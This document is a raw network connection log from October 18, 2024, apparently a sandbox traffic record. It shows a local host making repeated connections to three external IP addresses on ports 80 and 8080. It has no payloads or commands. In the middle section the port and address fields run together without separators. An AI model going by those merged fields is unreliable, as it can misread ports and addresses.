Oct 18, 2024 12:43:24.580569983 CEST | 49889 | 80 | 192.168.2.9 | 185.53.178.50
Oct 18, 2024 12:43:24.580868006 CEST | 49918 | 80 | 192.168.2.9 | 185.53.178.50
Oct 18, 2024 12:43:24.585781097 CEST | 80 | 49918 | 185.53.178.50 | 192.168.2.9
Oct 18, 2024 12:43:24.585865974 CEST | 49918 | 80 | 192.168.2.9 | 185.53.178.50
Oct 18, 2024 12:43:24.586041927 CEST | 80 | 49889 | 185.53.178.50 | 192.168.2.9
Oct 18, 2024 12:43:24.586462021 CEST | 49889 | 80 | 192.168.2.9 | 185.53.178.50
Oct 18, 2024 12:43:24.627928972 CEST | 49918 | 80 | 192.168.2.9 | 185.53.178.50
Oct 18, 2024 12:43:24.632735014 CEST | 80 | 49918 | 185.53.178.50 | 192.168.2.9
Oct 18, 2024 12:43:25.649245977 CEST | 80 | 49918 | 185.53.178.50 | 192.168.2.9
Oct 18, 2024 12:43:25.649267912 CEST | 80 | 49918 | 185.53.178.50 | 192.168.2.9
Oct 18, 2024 12:43:25.649317980 CEST | 49918 | 80 | 192.168.2.9 | 185.53.178.50
Oct 18, 2024 12:43:25.649343014 CEST | 49918 | 80 | 192.168.2.9 | 185.53.178.50
Oct 18, 2024 12:43:25.649439096 CEST | 80 | 49918 | 185.53.178.50 | 192.168.2.9
Oct 18, 2024 12:43:25.649493933 CEST | 49918 | 80 | 192.168.2.9 | 185.53.178.50
Oct 18, 2024 12:43:25.649525881 CEST | 80 | 49918 | 185.53.178.50 | 192.168.2.9
Oct 18, 2024 12:43:25.649574041 CEST | 49918 | 80 | 192.168.2.9 | 185.53.178.50
Oct 18, 2024 12:43:26.697911024 CEST | 49927 | 8080 | 192.168.2.9 | 190.120.227.91
Oct 18, 2024 12:43:27.429698944 CEST | 8080 | 49927 | 190.120.227.91 | 192.168.2.9
Oct 18, 2024 12:43:27.429780006 CEST | 49927 | 8080 | 192.168.2.9 | 190.120.227.91
Oct 18, 2024 12:43:27.471786022 CEST | 49927 | 8080 | 192.168.2.9 | 190.120.227.91
Oct 18, 2024 12:43:27.476684093 CEST | 8080 | 49927 | 190.120.227.91 | 192.168.2.9
Oct 18, 2024 12:43:31.472599030 CEST | 49927 | 8080 | 192.168.2.9 | 190.120.227.91
Oct 18, 2024 12:43:32.159420967 CEST | 49918 | 80 | 192.168.2.9 | 185.53.178.50
Oct 18, 2024 12:43:32.159733057 CEST | 49949 | 80 | 192.168.2.9 | 185.53.178.50
Oct 18, 2024 12:43:32.164596081 CEST | 80 | 49918 | 185.53.178.50 | 192.168.2.9
Oct 18, 2024 12:43:32.164668083 CEST | 49918 | 80 | 192.168.2.9 | 185.53.178.50
Oct 18, 2024 12:43:32.164705038 CEST | 80 | 49949 | 185.53.178.50 | 192.168.2.9
Oct 18, 2024 12:43:32.164777994 CEST | 49949 | 80 | 192.168.2.9 | 185.53.178.50
Oct 18, 2024 12:43:32.202161074 CEST | 49949 | 80 | 192.168.2.9 | 185.53.178.50
Oct 18, 2024 12:43:32.207056999 CEST | 80 | 49949 | 185.53.178.50 | 192.168.2.9
Oct 18, 2024 12:43:33.227518082 CEST | 80 | 49949 | 185.53.178.50 | 192.168.2.9
Oct 18, 2024 12:43:33.227554083 CEST | 80 | 49949 | 185.53.178.50 | 192.168.2.9
Oct 18, 2024 12:43:33.227567911 CEST | 80 | 49949 | 185.53.178.50 | 192.168.2.9
Oct 18, 2024 12:43:33.227598906 CEST | 49949 | 80 | 192.168.2.9 | 185.53.178.50
Oct 18, 2024 12:43:33.227634907 CEST | 49949 | 80 | 192.168.2.9 | 185.53.178.50
Oct 18, 2024 12:43:33.227701902 CEST | 80 | 49949 | 185.53.178.50 | 192.168.2.9
Oct 18, 2024 12:43:33.227741003 CEST | 49949 | 80 | 192.168.2.9 | 185.53.178.50
Oct 18, 2024 12:43:33.410000086 CEST | 49955 | 8080 | 192.168.2.9 | 190.120.227.91
Oct 18, 2024 12:43:33.414918900 CEST | 8080 | 49955 | 190.120.227.91 | 192.168.2.9
Oct 18, 2024 12:43:33.414995909 CEST | 49955 | 8080 | 192.168.2.9 | 190.120.227.91
Oct 18, 2024 12:43:33.424642086 CEST | 49955 | 8080 | 192.168.2.9 | 190.120.227.91
Oct 18, 2024 12:43:33.429682970 CEST | 8080 | 49955 | 190.120.227.91 | 192.168.2.9
Oct 18, 2024 12:43:37.472929001 CEST | 49955 | 8080 | 192.168.2.9 | 190.120.227.91
Oct 18, 2024 12:43:37.989969969 CEST | 49949 | 80 | 192.168.2.9 | 185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:37.990293980 CEST4997780192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:37.995134115 CEST8049977185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:37.995246887 CEST4997780192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:37.995358944 CEST8049949185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:37.995419025 CEST4994980192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:37.995996952 CEST4997780192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:38.000744104 CEST8049977185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:39.087029934 CEST8049977185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:39.087079048 CEST8049977185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:39.087091923 CEST8049977185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:39.087157011 CEST4997780192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:39.087182045 CEST4997780192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:39.289686918 CEST499838080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:39.294589043 CEST808049983190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:39.294653893 CEST499838080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:39.329504013 CEST499838080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:39.334419012 CEST808049983190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:40.783252001 CEST4997780192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:40.790420055 CEST8049977185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:40.790596008 CEST4997780192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:43.404850006 CEST499838080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:44.065087080 CEST5000180192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:44.070152998 CEST8050001185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:44.070266962 CEST5000180192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:44.070574999 CEST5000180192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:44.075443983 CEST8050001185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:45.144809961 CEST8050001185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:45.144839048 CEST8050001185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:45.144850969 CEST8050001185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:45.144871950 CEST5000180192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:45.144901037 CEST5000180192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:45.144948006 CEST8050001185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:45.145052910 CEST5000180192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:45.437901020 CEST500078080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:45.445193052 CEST808050007190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:45.445275068 CEST500078080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:45.472013950 CEST500078080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:45.478810072 CEST808050007190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:49.504204988 CEST500078080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:50.049314022 CEST5000180192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:50.049664021 CEST5002780192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:50.055505037 CEST8050027185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:50.055588007 CEST5002780192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:50.055830956 CEST8050001185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:50.055872917 CEST5000180192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:50.095988989 CEST5002780192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:50.100960016 CEST8050027185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:51.117496967 CEST8050027185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:51.117522955 CEST8050027185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:51.117535114 CEST8050027185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:51.117548943 CEST8050027185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:51.117597103 CEST5002780192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:51.117597103 CEST5002780192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:51.439960957 CEST500288080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:51.445147038 CEST808050028190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:51.445241928 CEST500288080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:51.487418890 CEST500288080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:51.492542982 CEST808050028190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:55.528704882 CEST500288080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:56.049257040 CEST5002780192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:56.049573898 CEST5002980192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:56.056343079 CEST8050029185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:56.056440115 CEST5002980192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:56.057172060 CEST8050027185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:56.057224989 CEST5002780192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:56.065637112 CEST5002980192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:56.071511984 CEST8050029185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:57.132951975 CEST8050029185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:57.132997990 CEST8050029185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:57.133016109 CEST8050029185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:57.133083105 CEST5002980192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:57.134689093 CEST5002980192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:57.346738100 CEST500308080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:57.373821020 CEST808050030190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:57.373935938 CEST500308080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:57.386337996 CEST500308080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:57.391252995 CEST808050030190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:58.973633051 CEST5003180192.168.2.9194.5.152.215
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:58.979250908 CEST8050031194.5.152.215192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:58.979337931 CEST5003180192.168.2.9194.5.152.215
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:27.848297119 CEST500418080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:27.853401899 CEST808050041190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:27.853497028 CEST500418080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:27.893058062 CEST500418080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:27.898036957 CEST808050041190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:32.108633995 CEST500418080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:32.924182892 CEST5004080192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:32.924482107 CEST5004280192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:32.929373980 CEST8050042185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:32.929470062 CEST5004280192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:32.929745913 CEST8050040185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:32.929789066 CEST5004080192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:32.972449064 CEST5004280192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:32.977572918 CEST8050042185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:34.003377914 CEST8050042185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:34.003463030 CEST8050042185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:34.003475904 CEST8050042185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:34.003473997 CEST5004280192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:34.003510952 CEST5004280192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:34.003518105 CEST5004280192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:34.237066984 CEST500438080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:34.242134094 CEST808050043190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:34.242247105 CEST500438080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:34.275511980 CEST500438080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:34.280626059 CEST808050043190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:38.544055939 CEST500438080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:39.143539906 CEST5004280192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:39.143891096 CEST5004480192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:39.148878098 CEST8050044185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:39.148982048 CEST5004480192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:39.149360895 CEST8050042185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:39.149420977 CEST5004280192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:39.174968958 CEST5004480192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:39.179874897 CEST8050044185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:40.244339943 CEST8050044185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:40.244394064 CEST8050044185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:40.244421959 CEST5004480192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:40.244427919 CEST8050044185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:40.244457960 CEST5004480192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:40.244462967 CEST8050044185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:40.244466066 CEST5004480192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:40.244498014 CEST5004480192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:40.502796888 CEST500458080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:40.509155035 CEST808050045190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:40.509257078 CEST500458080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:40.549698114 CEST500458080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:40.554915905 CEST808050045190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:44.568350077 CEST500458080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:46.191087961 CEST5004480192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:46.191416979 CEST5004680192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:46.196288109 CEST8050046185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:46.196382999 CEST5004680192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:46.196594000 CEST8050044185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:46.196644068 CEST5004480192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:46.237698078 CEST5004680192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:46.242605925 CEST8050046185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:46.880283117 CEST5004780192.168.2.9194.5.152.215
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:46.885282040 CEST8050047194.5.152.215192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:46.885485888 CEST5004780192.168.2.9194.5.152.215
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:46.885612011 CEST5004780192.168.2.9194.5.152.215
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:46.890412092 CEST8050047194.5.152.215192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:47.270262003 CEST8050046185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:47.270283937 CEST8050046185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:47.270302057 CEST8050046185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:47.270313025 CEST8050046185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:47.270314932 CEST5004680192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:47.270333052 CEST5004680192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:47.270370007 CEST5004680192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:47.503979921 CEST500488080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:47.508945942 CEST808050048190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:47.509043932 CEST500488080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:47.521785975 CEST500488080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:47.526837111 CEST808050048190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:51.551465988 CEST500488080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:52.129128933 CEST5004680192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:52.129645109 CEST5004980192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:52.134634972 CEST8050049185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:52.134649992 CEST8050046185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:52.134725094 CEST5004680192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:52.134740114 CEST5004980192.168.2.9185.53.178.50
Timestamp                             Source Port  Dest Port  Source IP        Dest IP
Oct 18, 2024 12:44:52.174532890 CEST  50049        80         192.168.2.9      185.53.178.50
Oct 18, 2024 12:44:52.179536104 CEST  80           50049      185.53.178.50    192.168.2.9
Oct 18, 2024 12:44:52.925184011 CEST  80           50047      194.5.152.215    192.168.2.9
Oct 18, 2024 12:44:53.017759085 CEST  50047        80         192.168.2.9      194.5.152.215
Oct 18, 2024 12:44:53.123960018 CEST  80           50047      194.5.152.215    192.168.2.9
Oct 18, 2024 12:44:53.124047995 CEST  50047        80         192.168.2.9      194.5.152.215
Oct 18, 2024 12:44:53.130570889 CEST  50047        80         192.168.2.9      194.5.152.215
Oct 18, 2024 12:44:53.135442019 CEST  80           50047      194.5.152.215    192.168.2.9
Oct 18, 2024 12:44:53.223341942 CEST  80           50049      185.53.178.50    192.168.2.9
Oct 18, 2024 12:44:53.223366976 CEST  80           50049      185.53.178.50    192.168.2.9
Oct 18, 2024 12:44:53.223381996 CEST  80           50049      185.53.178.50    192.168.2.9
Oct 18, 2024 12:44:53.223460913 CEST  50049        80         192.168.2.9      185.53.178.50
Oct 18, 2024 12:44:53.223500967 CEST  50049        80         192.168.2.9      185.53.178.50
Oct 18, 2024 12:44:53.637419939 CEST  50050        8080       192.168.2.9      190.120.227.91
Oct 18, 2024 12:44:53.642405987 CEST  8080         50050      190.120.227.91   192.168.2.9
Oct 18, 2024 12:44:53.642469883 CEST  50050        8080       192.168.2.9      190.120.227.91
Oct 18, 2024 12:44:53.642582893 CEST  50050        8080       192.168.2.9      190.120.227.91
Oct 18, 2024 12:44:53.647576094 CEST  8080         50050      190.120.227.91   192.168.2.9
Oct 18, 2024 12:44:57.651691914 CEST  50050        8080       192.168.2.9      190.120.227.91
Oct 18, 2024 12:44:58.044742107 CEST  50049        80         192.168.2.9      185.53.178.50
Oct 18, 2024 12:44:58.045064926 CEST  50051        80         192.168.2.9      185.53.178.50
Oct 18, 2024 12:44:58.050813913 CEST  80           50049      185.53.178.50    192.168.2.9
Oct 18, 2024 12:44:58.051374912 CEST  80           50051      185.53.178.50    192.168.2.9
Oct 18, 2024 12:44:58.051445007 CEST  50049        80         192.168.2.9      185.53.178.50
Oct 18, 2024 12:44:58.051496029 CEST  50051        80         192.168.2.9      185.53.178.50
Oct 18, 2024 12:44:58.051703930 CEST  50051        80         192.168.2.9      185.53.178.50
Oct 18, 2024 12:44:58.057674885 CEST  80           50051      185.53.178.50    192.168.2.9
Oct 18, 2024 12:44:59.153179884 CEST  80           50051      185.53.178.50    192.168.2.9
Oct 18, 2024 12:44:59.153238058 CEST  80           50051      185.53.178.50    192.168.2.9
Oct 18, 2024 12:44:59.153280020 CEST  80           50051      185.53.178.50    192.168.2.9
Oct 18, 2024 12:44:59.153316021 CEST  80           50051      185.53.178.50    192.168.2.9
Oct 18, 2024 12:44:59.153332949 CEST  50051        80         192.168.2.9      185.53.178.50
Oct 18, 2024 12:44:59.153379917 CEST  50051        80         192.168.2.9      185.53.178.50
Oct 18, 2024 12:44:59.218745947 CEST  50052        8080       192.168.2.9      190.120.227.91
Oct 18, 2024 12:44:59.225430965 CEST  8080         50052      190.120.227.91   192.168.2.9
Oct 18, 2024 12:44:59.225545883 CEST  50052        8080       192.168.2.9      190.120.227.91
Oct 18, 2024 12:44:59.245826960 CEST  50052        8080       192.168.2.9      190.120.227.91
Oct 18, 2024 12:44:59.251111984 CEST  8080         50052      190.120.227.91   192.168.2.9
Oct 18, 2024 12:45:03.284445047 CEST  50052        8080       192.168.2.9      190.120.227.91
Oct 18, 2024 12:45:03.721878052 CEST  50051        80         192.168.2.9      185.53.178.50
Oct 18, 2024 12:45:03.722181082 CEST  50053        80         192.168.2.9      185.53.178.50
Oct 18, 2024 12:45:03.727205038 CEST  80           50053      185.53.178.50    192.168.2.9
Oct 18, 2024 12:45:03.727304935 CEST  50053        80         192.168.2.9      185.53.178.50
Oct 18, 2024 12:45:03.728904963 CEST  80           50051      185.53.178.50    192.168.2.9
Oct 18, 2024 12:45:03.729039907 CEST  50051        80         192.168.2.9      185.53.178.50
Oct 18, 2024 12:45:03.738311052 CEST  50053        80         192.168.2.9      185.53.178.50
Oct 18, 2024 12:45:03.743294001 CEST  80           50053      185.53.178.50    192.168.2.9
Oct 18, 2024 12:45:04.962414026 CEST  80           50053      185.53.178.50    192.168.2.9
Oct 18, 2024 12:45:04.962460041 CEST  80           50053      185.53.178.50    192.168.2.9
Oct 18, 2024 12:45:04.962475061 CEST  80           50053      185.53.178.50    192.168.2.9
Oct 18, 2024 12:45:04.962591887 CEST  50053        80         192.168.2.9      185.53.178.50
Oct 18, 2024 12:45:04.964313030 CEST  80           50053      185.53.178.50    192.168.2.9
Oct 18, 2024 12:45:04.966932058 CEST  50053        80         192.168.2.9      185.53.178.50
Oct 18, 2024 12:45:05.442303896 CEST  50054        8080       192.168.2.9      190.120.227.91
Oct 18, 2024 12:45:05.454047918 CEST  8080         50054      190.120.227.91   192.168.2.9
Oct 18, 2024 12:45:05.457093954 CEST  50054        8080       192.168.2.9      190.120.227.91
Oct 18, 2024 12:45:05.488503933 CEST  50054        8080       192.168.2.9      190.120.227.91
Oct 18, 2024 12:45:05.503032923 CEST  8080         50054      190.120.227.91   192.168.2.9
Oct 18, 2024 12:45:09.512490034 CEST  50054        8080       192.168.2.9      190.120.227.91
Oct 18, 2024 12:45:10.026602983 CEST  50053        80         192.168.2.9      185.53.178.50
Oct 18, 2024 12:45:10.026942968 CEST  50055        80         192.168.2.9      185.53.178.50
Oct 18, 2024 12:45:10.033293962 CEST  80           50053      185.53.178.50    192.168.2.9
Oct 18, 2024 12:45:10.033322096 CEST  80           50055      185.53.178.50    192.168.2.9
Oct 18, 2024 12:45:10.033353090 CEST  50053        80         192.168.2.9      185.53.178.50
Oct 18, 2024 12:45:10.033418894 CEST  50055        80         192.168.2.9      185.53.178.50
Oct 18, 2024 12:45:10.036904097 CEST  50055        80         192.168.2.9      185.53.178.50
Oct 18, 2024 12:45:10.056204081 CEST  80           50055      185.53.178.50    192.168.2.9
Oct 18, 2024 12:45:11.223932028 CEST  80           50055      185.53.178.50    192.168.2.9
Oct 18, 2024 12:45:11.223968983 CEST  80           50055      185.53.178.50    192.168.2.9
Oct 18, 2024 12:45:11.223989010 CEST  80           50055      185.53.178.50    192.168.2.9
Oct 18, 2024 12:45:11.224025965 CEST  50055        80         192.168.2.9      185.53.178.50
